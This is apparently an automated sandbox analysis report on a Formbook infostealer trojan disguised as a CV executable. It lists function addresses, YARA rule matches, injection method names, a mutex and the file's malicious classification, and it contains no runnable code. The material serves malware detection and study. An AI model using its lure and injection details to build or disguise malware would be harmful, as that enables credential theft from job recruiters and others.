            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0157EFA02_2_0157EFA0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01500E592_2_01500E59
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015BEE262_2_015BEE26
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015BEEDB2_2_015BEEDB
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01512E902_2_01512E90
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015BCE932_2_015BCE93
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015CB16B2_2_015CB16B
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014EF1722_2_014EF172
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0153516C2_2_0153516C
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0150B1B02_2_0150B1B0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015070C02_2_015070C0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015AF0CC2_2_015AF0CC
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015B70E92_2_015B70E9
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015BF0E02_2_015BF0E0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014ED34C2_2_014ED34C
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015B132D2_2_015B132D
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0154739A2_2_0154739A
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0151B2C02_2_0151B2C0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015A12ED2_2_015A12ED
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015052A02_2_015052A0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015B75712_2_015B7571
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015C95C32_2_015C95C3
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0159D5B02_2_0159D5B0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F14602_2_014F1460
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015BF43F2_2_015BF43F
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015BF7B02_2_015BF7B0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015456302_2_01545630
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015B16CC2_2_015B16CC
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015099502_2_01509950
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0151B9502_2_0151B950
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015959102_2_01595910
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0156D8002_2_0156D800
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015038E02_2_015038E0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015BFB762_2_015BFB76
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01575BF02_2_01575BF0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0153DBF92_2_0153DBF9
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0151FB802_2_0151FB80
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015BFA492_2_015BFA49
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015B7A462_2_015B7A46
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01573A6C2_2_01573A6C
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015ADAC62_2_015ADAC6
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01545AA02_2_01545AA0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0159DAAC2_2_0159DAAC
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015A1AA32_2_015A1AA3
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015B1D5A2_2_015B1D5A
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01503D402_2_01503D40
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015B7D732_2_015B7D73
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0151FDC02_2_0151FDC0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01579C322_2_01579C32
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015BFCF22_2_015BFCF2
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015BFF092_2_015BFF09
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014C3FD52_2_014C3FD5
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014C3FD22_2_014C3FD2
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01501F922_2_01501F92
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015BFFB12_2_015BFFB1
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01509EB02_2_01509EB0
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeCode function: 14_2_04BA592C14_2_04BA592C
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeCode function: 14_2_04BA76D914_2_04BA76D9
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeCode function: 14_2_04BC4F5914_2_04BC4F59
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeCode function: 14_2_04BA78F914_2_04BA78F9
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeCode function: 14_2_04BAE01914_2_04BAE019
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeCode function: 14_2_04BA597914_2_04BA5979
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeCode function: 14_2_04BA597214_2_04BA5972
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_0511053515_2_05110535
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051D059115_2_051D0591
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051C244615_2_051C2446
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051BE4F615_2_051BE4F6
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_0513475015_2_05134750
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_0511077015_2_05110770
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_0510C7C015_2_0510C7C0
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_0512C6E015_2_0512C6E0
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051AA11815_2_051AA118
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_0510010015_2_05100100
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_0519815815_2_05198158
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051D01AA15_2_051D01AA
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051C81CC15_2_051C81CC
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051A200015_2_051A2000
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051CA35215_2_051CA352
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_0511E3F015_2_0511E3F0
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051D03E615_2_051D03E6
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051B027415_2_051B0274
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051902C015_2_051902C0
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_0511AD0015_2_0511AD00
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_05128DBF15_2_05128DBF
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_0510ADE015_2_0510ADE0
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_05110C0015_2_05110C00
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051B0CB515_2_051B0CB5
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_05100CF215_2_05100CF2
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_05130F3015_2_05130F30
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_05152F2815_2_05152F28
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_05184F4015_2_05184F40
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_0518EFA015_2_0518EFA0
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_05102FC815_2_05102FC8
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_0511CFE015_2_0511CFE0
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051CEE2615_2_051CEE26
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_05110E5915_2_05110E59
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_05122E9015_2_05122E90
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051CCE9315_2_051CCE93
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051CEEDB15_2_051CEEDB
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_0512696215_2_05126962
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051129A015_2_051129A0
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051DA9A615_2_051DA9A6
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_0511A84015_2_0511A840
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_0511284015_2_05112840
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_050F68B815_2_050F68B8
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_0513E8F015_2_0513E8F0
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051CAB4015_2_051CAB40
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051C6BD715_2_051C6BD7
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_0510EA8015_2_0510EA80
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051C757115_2_051C7571
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051AD5B015_2_051AD5B0
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051CF43F15_2_051CF43F
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_0510146015_2_05101460
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051CF7B015_2_051CF7B0
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051C16CC15_2_051C16CC
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051DB16B15_2_051DB16B
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_0514516C15_2_0514516C
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_050FF17215_2_050FF172
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_0511B1B015_2_0511B1B0
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051170C015_2_051170C0
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051BF0CC15_2_051BF0CC
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051C70E915_2_051C70E9
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051CF0E015_2_051CF0E0
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051C132D15_2_051C132D
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_050FD34C15_2_050FD34C
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_0515739A15_2_0515739A
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051152A015_2_051152A0
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_0512B2C015_2_0512B2C0
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051B12ED15_2_051B12ED
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051C1D5A15_2_051C1D5A
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_05113D4015_2_05113D40
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051C7D7315_2_051C7D73
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_0512FDC015_2_0512FDC0
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_05189C3215_2_05189C32
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051CFCF215_2_051CFCF2
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051CFF0915_2_051CFF09
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_05111F9215_2_05111F92
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051CFFB115_2_051CFFB1
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_05119EB015_2_05119EB0
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051A591015_2_051A5910
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_0511995015_2_05119950
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_0512B95015_2_0512B950
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_0517D80015_2_0517D800
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051138E015_2_051138E0
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051CFB7615_2_051CFB76
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_0512FB8015_2_0512FB80
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_05185BF015_2_05185BF0
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_0514DBF915_2_0514DBF9
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051CFA4915_2_051CFA49
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051C7A4615_2_051C7A46
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_05183A6C15_2_05183A6C
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_05155AA015_2_05155AA0
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051ADAAC15_2_051ADAAC
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_051BDAC615_2_051BDAC6
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_02FD19D015_2_02FD19D0
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_02FEA45015_2_02FEA450
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_02FD351015_2_02FD3510
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_02FCCBD015_2_02FCCBD0
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_02FCAE7015_2_02FCAE70
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_02FCAE6915_2_02FCAE69
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_02FCCDF015_2_02FCCDF0
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: String function: 0518F290 appears 105 times
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: String function: 050FB970 appears 272 times
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: String function: 0517EA12 appears 86 times
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: String function: 05145130 appears 57 times
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: String function: 05157E54 appears 100 times
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: String function: 0157F290 appears 105 times
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: String function: 014EB970 appears 277 times
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: String function: 01535130 appears 58 times
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: String function: 0156EA12 appears 86 times
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: String function: 01547E54 appears 111 times
            Source: Curriculum Vitae Catalina Munoz.exe, 00000000.00000002.1208080989.00000000074E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs Curriculum Vitae Catalina Munoz.exe
            Source: Curriculum Vitae Catalina Munoz.exe, 00000000.00000000.1185445435.0000000000AC6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWrNb.exeF vs Curriculum Vitae Catalina Munoz.exe
            Source: Curriculum Vitae Catalina Munoz.exe, 00000000.00000002.1210757792.0000000008E70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Curriculum Vitae Catalina Munoz.exe
            Source: Curriculum Vitae Catalina Munoz.exe, 00000000.00000002.1202755559.000000000106E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Curriculum Vitae Catalina Munoz.exe
            Source: Curriculum Vitae Catalina Munoz.exe, 00000000.00000002.1204596679.000000000413A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Curriculum Vitae Catalina Munoz.exe
            Source: Curriculum Vitae Catalina Munoz.exe, 00000002.00000002.1457615887.0000000000F18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTSThemeS.exej% vs Curriculum Vitae Catalina Munoz.exe
            Source: Curriculum Vitae Catalina Munoz.exe, 00000002.00000002.1457615887.0000000000F3D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTSThemeS.exej% vs Curriculum Vitae Catalina Munoz.exe
            Source: Curriculum Vitae Catalina Munoz.exe, 00000002.00000002.1457839890.00000000015ED000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Curriculum Vitae Catalina Munoz.exe
            Source: Curriculum Vitae Catalina Munoz.exeBinary or memory string: OriginalFilenameWrNb.exeF vs Curriculum Vitae Catalina Munoz.exe
            Source: Curriculum Vitae Catalina Munoz.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: 2.2.Curriculum Vitae Catalina Munoz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.Curriculum Vitae Catalina Munoz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1457438353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000F.00000002.3658674267.0000000003480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000010.00000002.3665046974.00000000048F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000F.00000002.3662944861.0000000004E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1459154555.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1459314243.00000000037F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Curriculum Vitae Catalina Munoz.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, OxYXTBPtl3LAaaTJsD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, Hpb6sX0m5OuPGE34GK.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, Hpb6sX0m5OuPGE34GK.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, Hpb6sX0m5OuPGE34GK.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, Hpb6sX0m5OuPGE34GK.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, Hpb6sX0m5OuPGE34GK.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, Hpb6sX0m5OuPGE34GK.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, OxYXTBPtl3LAaaTJsD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, OxYXTBPtl3LAaaTJsD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, Hpb6sX0m5OuPGE34GK.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, Hpb6sX0m5OuPGE34GK.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, Hpb6sX0m5OuPGE34GK.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.2e2aed4.1.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.7500000.5.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.2e3aeec.0.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/1@16/12
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeMutant created: NULL
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
            Source: C:\Windows\SysWOW64\TSTheme.exeFile created: C:\Users\user~1\AppData\Local\Temp\63u1Q-PJump to behavior
